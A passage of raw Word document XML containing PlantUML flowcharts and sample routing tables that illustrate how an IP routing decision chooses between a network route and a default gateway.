              <w:t>0.0.0.0            192.168.1.254   0.0.0.0               UG    100    0   152   eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABF46E4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.0.0      192.168.1.254   255.255.0.0       UG    75      0     5     eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770F8792" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>192.168.1.0     0.0.0.0              255.255.255.0   U        0      0   200   eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D0D7B6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF03BB5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A2F5962" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Exact host match found?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6584DB24" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray :Send directly;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D7EC6A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A956D68" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (Network match found?) then (yes\n172.16.0.0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319312E3" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (Uses gateway?) then (yes\n192.168.1.254)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72485BB7" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      #LightSkyBlue :Forward packet to next hop (192.168.1.254);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF35FBC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAC8AA2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      #LightGray :Send directly to host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="194F52CE" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13285652" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D844515" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    #LightGray :Use default route;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265B006F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2C78F2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21288E7E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BEF428E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D8FFB4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63D6661E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>legend right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331882E9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue = taken path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6301B4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray    = not taken</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47454728" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endlegend</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C7B188" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2459">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="752AE8FE" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E0E22CD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scenario 3 – Default Route via Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F59DAC7" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="57958935" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A395D46" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F5F9764" wp14:editId="713FBAFB">
                  <wp:extent cx="6940467" cy="4876245"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="110210904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9922" cy="4896940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55BC09CA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D06F8A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam monochrome false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C53BCDA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam activity {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7380C81D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BackgroundColor white</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8A0755" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BorderColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00481908" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  FontColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68F4F084" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BBE308" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E015B10" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>title Routing Decision – Default Route via Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350F2E49" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="226F6636" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B0E83B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Packet arrives with destination IP (8.8.8.8);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC9E544" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B6D46A2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Extract destination IP from packet header;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3B821A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07FB03B4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Search routing table for matching entries;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C9C537" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E9FAAFE" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6FAE36" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Sample Routing Table:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D7B2296" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Destination     Gateway             Genmask           Flags     Metric     Ref    Use       Iface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EAAD95" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>0.0.0.0            192.168.1.254    0.0.0.0               UG        100         0       152       eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611205D8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>192.168.1.0    0.0.0.0                255.255.255.0   U           0             0       200      eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B770BB6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7108E93B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DE86B66" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Exact host match found?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586D28B5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray :Send directly;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBF7CF2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43293DE9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (Network match found?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2038E000" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    #LightGray :Send via network route;</w:t>
            </w:r>
